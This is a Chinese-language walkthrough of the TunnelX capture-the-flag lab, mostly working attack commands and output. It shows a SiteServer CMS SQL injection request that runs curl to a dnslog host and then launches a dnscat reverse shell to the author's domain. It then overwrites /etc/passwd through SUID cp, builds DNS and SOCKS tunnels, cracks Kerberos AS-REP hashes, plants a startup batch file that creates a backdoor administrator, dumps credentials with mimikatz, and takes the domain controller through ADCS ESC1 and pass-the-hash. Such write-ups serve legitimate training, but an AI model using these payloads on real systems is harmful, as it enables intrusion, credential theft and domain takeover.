春秋云境-TunnelX

ftp匿名登录&7z爆破

.\fscan64.exe -h 121.89.201.206 -p 1-65535

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 121.89.201.206  is alive
[*] Icmp alive hosts len is: 1
121.89.201.206:80 open
121.89.201.206:139 open
121.89.201.206:135 open
121.89.201.206:2121 open
121.89.201.206:3389 open
121.89.201.206:15774 open
121.89.201.206:47001 open
121.89.201.206:49664 open
121.89.201.206:49666 open
121.89.201.206:49665 open
121.89.201.206:49667 open
121.89.201.206:49669 open
121.89.201.206:49668 open
121.89.201.206:49676 open
121.89.201.206:49677 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo:
[*]121.89.201.206
   [->]Web
   [->]172.22.61.50
[*] WebTitle: http://121.89.201.206     code:200 len:24977  title:Zosimos
[*] WebTitle: http://121.89.201.206:47001 code:404 len:315    title:Not Found

一堆40000端口，不确定是不是误报，毕竟就扫一遍

比较有意思得是2121端口是个ftp服务，且可以匿名登录

ftp anonymous@121.89.201.206 2121
ls
get secret.7z

下载下来secret.7z

先将secret.7z转换为john格式，然后再用john去爆破密码

遇到报错一般需要装一下依赖

su
apt install liblzma-dev
apt-get install cpanminus
cpan Compress::Raw::Lzma

如果遇到下载卡住不动，代理开tun就行了

7z2john secret.7z >1.txt
john 1.txt --wordlist=/usr/share/wordlists/rockyou.txt
john 1.txt --wordlist=./rockyou.txt

爆出密码13131313

解压得到

A strange character string, You're the only one I'm telling
e7d41890-5742-48f0-9f3c-1393db541fc7

暂时不知道如何利用

CVE-2021-42655 sql注入

再看一下80端口的服务

发现为SiteServer CMS v16.5

存在cve：https://github.com/siteserver/cms/issues/3237

通过查看文档：API 身份认证 | SiteServer REST API (sscms.com)

可以发现，可以利用Header的API认证方式代替账号密码登录，通过这样，无需登录就可以利用这个后台sql注入了

exp：

POST /api/pages/cms/libraryText/list HTTP/1.1
Host: 121.89.201.206
X-SS-API-KEY: e7d41890-5742-48f0-9f3c-1393db541fc7
Content-Type: application/json
Content-Length: 127

{"siteId":1,"keyword":"';select sys_eval('curl `whoami`.38zvxi.dnslog.cn')-- ","groupId":0,"page":1,"perPage":24}

这里请求头X-SS-API-KEY的值就是刚才7z解密出来里面的那串字符串，也就是它的api密钥

DNS隧道搭建&反弹shell

但这是站库分离的站点，并且MySQL数据库的TCP是不出网的，但DNS出网（可以用curl外带部分命令结果），所以可以搭建DNS隧道

这里只能利用cve执行SQL语句，但可以采用加载udf.so的方式执行命令

已经有前人给我们造好了轮子：https://github.com/LxxxSec/TunnelX/blob/master/udf-dnscat.py

下载下来，改一下ip和apikey的值，直接执行就可以了

接着就是使用dnscat利用DNS隧道反弹shell，域名解析如下配置

然后安全组开放53端口（udp），如果被占用了记得关掉对应的服务（例如c2）

docker run -p 53:53/udp -it --rm mpercival/dnscat2 ruby ./dnscat2.rb ns.supersmallblack.cn -c datou

POST /api/pages/cms/libraryText/list HTTP/1.1
Host: 121.89.201.206
X-SS-API-KEY: e7d41890-5742-48f0-9f3c-1393db541fc7
Content-Type: application/json
Content-Length: 135

{"siteId":1,"keyword":"';select sys_eval('/tmp/dnscat --secret=datou ns.supersmallblack.cn')-- ","groupId":0,"page":1,"perPage":24}

成功弹上shell

window -i 1

切换到接收到的session

shell
window -i 3

就可以执行命令了

先提升一下交互性

python -c 'import pty;pty.spawn("/bin/bash")'

Suid cp提权

读flag的权限不够，需要提权

优先考虑一下suid

find / -perm -u=s -type f 2>/dev/null

/bin/fusermount
/bin/ping6
/bin/mount
/bin/su
/bin/ping
/bin/umount
/bin/cp
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/staprun
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/s-nail/s-nail-privsep

cp命令比较不常见，确实可以用来提权

cd /tmp
cp /etc/passwd ./

// 这里直接拿我之前生成的来用
openssl passwd -1 -salt test 1234    //生成密码
$1$test$So8QlDklBBy90T3QcEYWU/      //得到
test:$1$test$So8QlDklBBy90T3QcEYWU/:0:0:/root:/bin/bash      //构造好

cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
ntp:x:108:114::/home/ntp:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
_chrony:x:110:119:Chrony daemon,,,:/var/lib/chrony:/bin/false
mysql:x:111:120:MySQL Server,,,:/var/lib/mysql:/bin/false

touch passwd1
chmod 777 passwd1

交互性不是很好，用vim有点乱，就用echo吧

echo 'root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
ntp:x:108:114::/home/ntp:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
_chrony:x:110:119:Chrony daemon,,,:/var/lib/chrony:/bin/false
mysql:x:111:120:MySQL Server,,,:/var/lib/mysql:/bin/false
test:$1$test$So8QlDklBBy90T3QcEYWU/:0:0:/root:/bin/bash' > passwd1

在cp去覆盖掉/etc/passwd

cp /tmp/passwd1 /etc/passwd

覆盖成功后就多了个root权限的test用户了

su test
1234

搭建DNS代理&内网信息收集

这里使用iodine做个DNS代理

大头哥写好的iodine传输脚本：https://github.com/LxxxSec/TunnelX/blob/master/iodine.py

拿来修改ip就能用了，贼方便

python3 ./iodine.py

md5sum iodine
4d4718d4eeaacedec9e0ca207f00e6ca  iodine

md5没问题，现在就是搭建代理了，但是问题是dnscat和iodine都依赖53端口，这样的话会端口占用，除非用2个vps

但是大佬的wp也给出了解决办法：让程序挂后台sleep一会

iodine的工作原理是：在vps中启动一个服务端，会创建一个dns0虚拟网卡，然后我们在靶机中运行客户端，同样也会在客户端创建一个虚拟网卡dns0，然后去连接vps中53端口的服务端，这样靶机的机器就被加入到了dns0虚拟网卡上，注意靶机需要以root权限运行iodine

在靶机中以root权限运行下方命令

chmod +x /tmp/iodine
nohup sleep 10 && /tmp/iodine -f -P datou ns.supersmallblack.cn &

然后快速Ctrl+c掐掉dnscat的docker容器，再在vps上启动一个iodine服务端，等待靶机回连：

./iodined -f -c -P datou 192.168.0.1 ns.supersmallblack.cn -DD

这里的命令会创建一个192.168.0.1网段的虚拟网卡

iodine是受控端，iodined是控制端

可以看到是成功建立连接了

上线的靶机会分配到192.168.0.2这个IP，ssh连接

ssh test@192.168.0.2
1234

然后就是需要把VPS上虚拟网卡192.168.0.2的流量转发出来建立socks5隧道

在vps用ssh命令创建一个socks代理：

ssh -N -D 29999 test@192.168.0.2

输入密码后会在vps的localhost监听29999端口，但由于不是0.0.0.0 外部仍不能连接

再用ssh隧道把VPS上29999端口的流量转发到公网6000端口上创建socks代理

记得kill，不然会在后台一直执行）

netstat -nap | grep 6000

ssh -C -f -N -g -L 0.0.0.0:6000:127.0.0.1:29999 root@VPS

挂上代理，利用内网ip172.22.61.50访问服务是可以的

接下来就是信息搜集了

ifconfig

# ifconfig
dns0      Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  
          inet addr:192.168.0.2  P-t-P:192.168.0.2  Mask:255.255.255.224
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1130  Metric:1
          RX packets:1714 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2558 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500 
          RX bytes:143027 (143.0 KB)  TX bytes:2681224 (2.6 MB)

eth0      Link encap:Ethernet  HWaddr 00:16:3e:02:ec:fa  
          inet addr:172.22.61.41  Bcast:172.22.255.255  Mask:255.255.0.0
          inet6 addr: fe80::216:3eff:fe02:ecfa/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:144772 errors:0 dropped:0 overruns:0 frame:0
          TX packets:56721 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:159456982 (159.4 MB)  TX bytes:15546864 (15.5 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:8 errors:0 dropped:0 overruns:0 frame:0
          TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:500 (500.0 B)  TX bytes:500 (500.0 B)

在vps上用scp传文件

scp fscan_amd64 test@192.168.0.2:/tmp/fscan_amd64

./fscan_amd64 -h 172.22.61.41/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.61.41    is alive
(icmp) Target 172.22.61.17    is alive
(icmp) Target 172.22.61.50    is alive
(icmp) Target 172.22.61.34    is alive
[*] Icmp alive hosts len is: 4
172.22.61.50:139 open
172.22.61.17:139 open
172.22.61.34:135 open
172.22.61.17:135 open
172.22.61.50:80 open
172.22.61.41:22 open
172.22.61.50:135 open
172.22.61.41:3306 open
172.22.61.34:445 open
172.22.61.50:445 open
172.22.61.17:445 open
172.22.61.34:139 open
172.22.61.17:88 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo:
[*]172.22.61.34
   [->]WIN2012
   [->]172.22.61.34
[*] NetInfo:
[*]172.22.61.17
   [->]DC
   [->]172.22.61.17
   [->]2001:0:348b:fb58:2c2e:19c5:86a6:225e
[*] NetInfo:
[*]172.22.61.50
   [->]Web
   [->]172.22.61.50
[*] NetBios: 172.22.61.50    Web.xiaorang.lab                    Windows Server 2016 Datacenter 14393 
[*] 172.22.61.17  (Windows Server 2016 Datacenter 14393)
[*] NetBios: 172.22.61.17    [+]DC DC.xiaorang.lab               Windows Server 2016 Datacenter 14393 
[*] NetBios: 172.22.61.34    WIN2012.xiaorang.lab                Windows Server 2012 R2 Datacenter 9600 
[*] WebTitle: http://172.22.61.50       code:200 len:24977  title:Zosimos

分析一下

172.22.61.17 DC.xiaorang.lab  域控
172.22.61.50 Web.xiaorang.lab 外网SSCMS
172.22.61.34 WIN2012.xiaorang.lab
172.22.61.41 已拿下

AS-REP Roasting

这里DC的ldap服务可以匿名访问，可以用ldapsearch查询所有域用户

proxychains4 ldapsearch -H ldap://172.22.61.17 -b "DC=xiaorang,DC=lab" -x|grep ',CN=Users,DC=xiaorang,DC=lab'

dn: CN=Administrator,CN=Users,DC=xiaorang,DC=lab
dn: CN=Guest,CN=Users,DC=xiaorang,DC=lab
distinguishedName: CN=Guest,CN=Users,DC=xiaorang,DC=lab
dn: CN=DefaultAccount,CN=Users,DC=xiaorang,DC=lab
dn: CN=krbtgt,CN=Users,DC=xiaorang,DC=lab
dn: CN=Domain Computers,CN=Users,DC=xiaorang,DC=lab
dn: CN=Domain Controllers,CN=Users,DC=xiaorang,DC=lab
dn: CN=Schema Admins,CN=Users,DC=xiaorang,DC=lab
dn: CN=Enterprise Admins,CN=Users,DC=xiaorang,DC=lab
dn: CN=Cert Publishers,CN=Users,DC=xiaorang,DC=lab
dn: CN=Domain Admins,CN=Users,DC=xiaorang,DC=lab
dn: CN=Domain Users,CN=Users,DC=xiaorang,DC=lab
dn: CN=Domain Guests,CN=Users,DC=xiaorang,DC=lab
dn: CN=Group Policy Creator Owners,CN=Users,DC=xiaorang,DC=lab
dn: CN=RAS and IAS Servers,CN=Users,DC=xiaorang,DC=lab
dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=xiaorang,DC=lab
dn: CN=Denied RODC Password Replication Group,CN=Users,DC=xiaorang,DC=lab
dn: CN=Read-only Domain Controllers,CN=Users,DC=xiaorang,DC=lab
dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=xiaorang,DC=lab
dn: CN=Cloneable Domain Controllers,CN=Users,DC=xiaorang,DC=lab
dn: CN=Protected Users,CN=Users,DC=xiaorang,DC=lab
distinguishedName: CN=Protected Users,CN=Users,DC=xiaorang,DC=lab
dn: CN=Key Admins,CN=Users,DC=xiaorang,DC=lab
dn: CN=Enterprise Key Admins,CN=Users,DC=xiaorang,DC=lab
dn: CN=DnsAdmins,CN=Users,DC=xiaorang,DC=lab
distinguishedName: CN=DnsAdmins,CN=Users,DC=xiaorang,DC=lab
dn: CN=DnsUpdateProxy,CN=Users,DC=xiaorang,DC=lab
dn: CN=wangmei,CN=Users,DC=xiaorang,DC=lab
distinguishedName: CN=wangmei,CN=Users,DC=xiaorang,DC=lab
dn: CN=zhangjing,CN=Users,DC=xiaorang,DC=lab
dn: CN=wangyong,CN=Users,DC=xiaorang,DC=lab
dn: CN=huangyong,CN=Users,DC=xiaorang,DC=lab
dn: CN=lixiang,CN=Users,DC=xiaorang,DC=lab
dn: CN=chenlei,CN=Users,DC=xiaorang,DC=lab
distinguishedName: CN=chenlei,CN=Users,DC=xiaorang,DC=lab
dn: CN=yangjie,CN=Users,DC=xiaorang,DC=lab
distinguishedName: CN=yangjie,CN=Users,DC=xiaorang,DC=lab
dn: CN=zhangjun,CN=Users,DC=xiaorang,DC=lab
dn: CN=yangdming,CN=Users,DC=xiaorang,DC=lab
dn: CN=zhangmei,CN=Users,DC=xiaorang,DC=lab
dn: CN=wangrong,CN=Users,DC=xiaorang,DC=lab
dn: CN=zhangpeng,CN=Users,DC=xiaorang,DC=lab
dn: CN=liuyun,CN=Users,DC=xiaorang,DC=lab
distinguishedName: CN=liuyun,CN=Users,DC=xiaorang,DC=lab
dn: CN=Shutdown_group,CN=Users,DC=xiaorang,DC=lab

总结出以下用户

wangmei
zhangjing
wangyong
huangyong
lixiang
chenlei
yangjie
zhangjun
yangdming
zhangmei
wangrong
zhangpeng
liuyun
Shutdown_group

查询一下这些域用户是否开启了“不要求Kerberos预身份验证”选项

proxychains4 python GetNPUsers.py -dc-ip 172.22.61.17 -usersfile ./../../../../../home/chenzhipeng/桌面/user.txt xiaorang.lab/

$krb5asrep$23$yangdming@XIAORANG.LAB:058fc5bd90093a2537c107e1d26ceef1$9050165f3b06f50786efd681498996c41ffee14ea5c20e62b266d17d30dd5e7c0b291cfe9f319d6cd0ae019251c24a8b3b1d3f5421e20da6c2403dd37e8ec7940373cf6dd52d1d9dc26a0bc0e581b37afe6c0b438240a44f7f912f62da789f5d7d3c975d446b5b31d9a1cad767d66a78daeec92dd1bec5223e62f91797e7b264232534424162ee4833a309fb04d7fffbe582397ba9be66e36482896531b86b67d716f415d8842d513bda0d945152314cc61a5b2fc67372a5a7d04cbe1ddcc7bd92d4274a903a306f0aa42b925d32e76fafdef49623973129c72c91ca133bad743413488359ed4bc1577fa278

跑出来一个

hashcat爆破

hashcat -m 18200 '$krb5asrep$23$yangdming@XIAORANG.LAB:324cd949cb813b90b13219cfc6bbbd6e$1b4b3d2bc2c3d754e74e425e18c759c35a27a12341d4e41bd40248d60b4c5c064dcc2ecd7e17571022465b61db5fa98c7826a4fe8e132bb895c48fbcdcd8f011c97ee741d716ca1401ba24a3fd01d72d95071d447a1def6d8cebb9e57108fa3ac2f235b86b281a198e84518fa06b0c3c8d0a8c51a025693ee5e8a23f7757499daf2a336bf26acb952bf814f891c435799221124c94d68a78c44e632eb1a8a6ab599e456cc037f89dee504cf56dcc1d8bef6f619cc7a3172be4d13430873588028dd547e3026ef229e4b545c825f14583baa7c2f0b94e6304a01021bb6fd5173cb2213060727b3e97c533277e' /usr/share/wordlists/rockyou.txt --force

$krb5asrep$23$yangdming@XIAORANG.LAB:324cd949cb813b90b13219cfc6bbbd6e$1b4b3d2bc2c3d754e74e425e18c759c35a27a12341d4e41bd40248d60b4c5c064dcc2ecd7e17571022465b61db5fa98c7826a4fe8e132bb895c48fbcdcd8f011c97ee741d716ca1401ba24a3fd01d72d95071d447a1def6d8cebb9e57108fa3ac2f235b86b281a198e84518fa06b0c3c8d0a8c51a025693ee5e8a23f7757499daf2a336bf26acb952bf814f891c435799221124c94d68a78c44e632eb1a8a6ab599e456cc037f89dee504cf56dcc1d8bef6f619cc7a3172be4d13430873588028dd547e3026ef229e4b545c825f14583baa7c2f0b94e6304a01021bb6fd5173cb2213060727b3e97c533277e:kier@n10

用户： yangdming
密码： kier@n10

尝试直接PTH连接没成功，尝试用evil-winrm连接

proxychains4 evil-winrm -i 172.22.61.34 -u yangdming -p kier@n10

可以连上，不出所料还是需要提权

先收集一波bloodhound分析一下域内关系

首先修改/etc/hosts文件，加上

172.22.61.17 xiaorang.lab
172.22.61.17 dc.xiaorang.lab

proxychains4 bloodhound-python -d xiaorang.lab -u yangdming -p kier@n10 -gc dc.xiaorang.lab -c all

没成功，显示：ERROR: Could not find a domain controller. Consider specifying a domain and/or DNS server.

尝试加上参数--zip --dns-tcp，连接超时，192.168.183.2:53 <–socket error or timeout!

还是通过evil-winrm上传SharpHound.exe

upload ./SharpHound.exe .

执行

C:\Users\TEMP.XIAORANG\Documents\SharpHound.exe --ldapusername yangdming --ldappassword kier@n10 -c all

下载下来

dir
download 20240318213429_BloodHound.zip ./TunnelX.zip

发现yangdming这个用户在SHUWDOWN_GROUP，能对机器重启，

SHUWDOWN_GROUP组内用户默认拥有重启机器的权限

因此可以使用启动项提权，首先在本地写一个add.bat，

@echo off
net localgroup administrators yangdming /add
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
net user benbi pass@123 /add
net localgroup administrators benbi /add

把yangdming添加到本地管理员组内，把LocalAccountTokenFilterPolicy设为1，添加benbi后门用户

上传到启动目录

upload ./add.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\add.bat"

然后重启

shutdown -r -t 0

等重启执行启动目录的脚本，就可以成功提权

这里的报错无需理会，重新连接查看是否生成后门账户

执行成功了，wmiexec.py连接去读flag就行了，rdp会很卡

proxychains4 python wmiexec.py benbi:pass@123@172.22.61.34

type C:\Users\Administrator\flag\flag03.txt

ADCS ESC1

故技重施，上传mimikatz.exe

upload ./mimikatz.exe .

拿管理员权限的benbi wmiexec.py连接，执行

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > 1.txt

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 91866 (00000000:000166da)
Session           : Interactive from 1
User Name         : Administrator
Domain            : WIN2012
Logon Server      : WIN2012
Logon Time        : 2024/3/18 21:39:55
SID               : S-1-5-21-1680859039-3343565292-670081017-500
        msv :
         [00010000] CredentialKeys
         * NTLM     : c8f9c9d0f45b132dd0ecc0ab84708a83
         * SHA1     : b6216e41f5c0ad4c37a5834c364c8422f7939f75
         [00000003] Primary
         * Username : Administrator
         * Domain   : WIN2012
         * NTLM     : c8f9c9d0f45b132dd0ecc0ab84708a83
         * SHA1     : b6216e41f5c0ad4c37a5834c364c8422f7939f75
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : WIN2012
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : WIN2012
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 43121 (00000000:0000a871)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/3/18 21:39:52
SID               : S-1-5-90-1
        msv :
         [00000003] Primary
         * Username : WIN2012$
         * Domain   : XIAORANG
         * NTLM     : 0bfcee87cefa1d68d6024d385da99d9e
         * SHA1     : 4e0c705c9b6b1ef62fd1c89fb16c7ddef22835a4
        tspkg :
        wdigest :
         * Username : WIN2012$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN2012$
         * Domain   : xiaorang.lab
         * Password : 4c d5 e3 91 62 8d 8b dc ae 6c bd 5d c3 7e 34 68 25 b5 f3 50 e0 ed d8 7f be 2a fd 08 5f 1a 93 22 01 44 f6 9c fc 41 a8 3c 76 7f 1d 7c 4d 6d d4 70 c2 6f 81 12 9e 95 44 c5 91 26 8b 12 9f 92 cf de 18 eb 7c 03 10 e9 36 2a 02 9e 14 bd f6 51 c3 ab 45 b3 5c 91 0e 58 0c 11 63 95 cb 41 e6 d6 46 6c 51 07 30 48 b0 e0 65 40 de 8e 45 09 3e 21 6c 82 92 b0 45 d0 16 08 85 79 67 77 08 3a a7 9d 80 71 91 9d 94 8d 87 2f 0d 82 26 03 9a 42 cb 79 f4 1e 1b 31 6f 80 42 6e d4 13 df c5 46 e9 a1 89 81 ca 7d a5 56 3f 66 cd bd 39 32 15 0b d1 03 95 58 cd b7 0c 8c ac c4 f0 55 c3 c8 cb fb c7 bf 22 9d 04 44 26 8b ab b5 99 8d 67 1a bb 74 e0 bb 2b 7f a2 8a cc 51 b0 a8 e2 60 30 e0 c0 5b 02 b1 3c b8 1a 68 a8 a1 d5 b6 2c fc 14 44 c1 ac df 72 2e 98 df 
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN2012$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2024/3/18 21:39:52
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : WIN2012$
         * Domain   : XIAORANG
         * NTLM     : 0bfcee87cefa1d68d6024d385da99d9e
         * SHA1     : 4e0c705c9b6b1ef62fd1c89fb16c7ddef22835a4
        tspkg :
        wdigest :
         * Username : WIN2012$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : win2012$
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 23030 (00000000:000059f6)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2024/3/18 21:39:52
SID               : 
        msv :
         [00000003] Primary
         * Username : WIN2012$
         * Domain   : XIAORANG
         * NTLM     : 0bfcee87cefa1d68d6024d385da99d9e
         * SHA1     : 4e0c705c9b6b1ef62fd1c89fb16c7ddef22835a4
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 43084 (00000000:0000a84c)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/3/18 21:39:52
SID               : S-1-5-90-1
        msv :
         [00000003] Primary
         * Username : WIN2012$
         * Domain   : XIAORANG
         * NTLM     : 0bfcee87cefa1d68d6024d385da99d9e
         * SHA1     : 4e0c705c9b6b1ef62fd1c89fb16c7ddef22835a4
        tspkg :
        wdigest :
         * Username : WIN2012$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN2012$
         * Domain   : xiaorang.lab
         * Password : 4c d5 e3 91 62 8d 8b dc ae 6c bd 5d c3 7e 34 68 25 b5 f3 50 e0 ed d8 7f be 2a fd 08 5f 1a 93 22 01 44 f6 9c fc 41 a8 3c 76 7f 1d 7c 4d 6d d4 70 c2 6f 81 12 9e 95 44 c5 91 26 8b 12 9f 92 cf de 18 eb 7c 03 10 e9 36 2a 02 9e 14 bd f6 51 c3 ab 45 b3 5c 91 0e 58 0c 11 63 95 cb 41 e6 d6 46 6c 51 07 30 48 b0 e0 65 40 de 8e 45 09 3e 21 6c 82 92 b0 45 d0 16 08 85 79 67 77 08 3a a7 9d 80 71 91 9d 94 8d 87 2f 0d 82 26 03 9a 42 cb 79 f4 1e 1b 31 6f 80 42 6e d4 13 df c5 46 e9 a1 89 81 ca 7d a5 56 3f 66 cd bd 39 32 15 0b d1 03 95 58 cd b7 0c 8c ac c4 f0 55 c3 c8 cb fb c7 bf 22 9d 04 44 26 8b ab b5 99 8d 67 1a bb 74 e0 bb 2b 7f a2 8a cc 51 b0 a8 e2 60 30 e0 c0 5b 02 b1 3c b8 1a 68 a8 a1 d5 b6 2c fc 14 44 c1 ac df 72 2e 98 df 
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/3/18 21:39:52
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN2012$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2024/3/18 21:39:52
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : WIN2012$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : win2012$
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

mimikatz(commandline) # exit
Bye!

有个机器账户WIN2012$的哈希

0bfcee87cefa1d68d6024d385da99d9e

看了一下ADCS

proxychains4 certipy-ad find -u win2012\$@xiaorang.lab -hashes 00000000000000000000000000000000:0bfcee87cefa1d68d6024d385da99d9e -dc-ip 172.22.61.17 -vulnerable

有ESC1，并且能用win2012模板打

为域管请求证书

proxychains4 certipy-ad req -u win2012\$@xiaorang.lab -hashes 00000000000000000000000000000000:0bfcee87cefa1d68d6024d385da99d9e -target 172.22.61.17 -ca xiaorang-DC-CA-CA -template win2012 -upn administrator@xiaorang.lab

转换格式，请求TGT

proxychains4 certipy-ad auth -pfx administrator.pfx -dc-ip 172.22.61.17

[*] Got hash for 'administrator@xiaorang.lab': aad3b435b51404eeaad3b435b51404ee:e26a28fd9daa8a6a4d3c5adbbdcb0f53

成功拿到域管哈希

PTH

proxychains4 python wmiexec.py xiaorang.lab/administrator@172.22.61.17 -hashes aad3b435b51404eeaad3b435b51404ee:e26a28fd9daa8a6a4d3c5adbbdcb0f53

type C:\Users\Administrator\flag\flag04.txt

最后再横向过去站库分离的那个站的机子

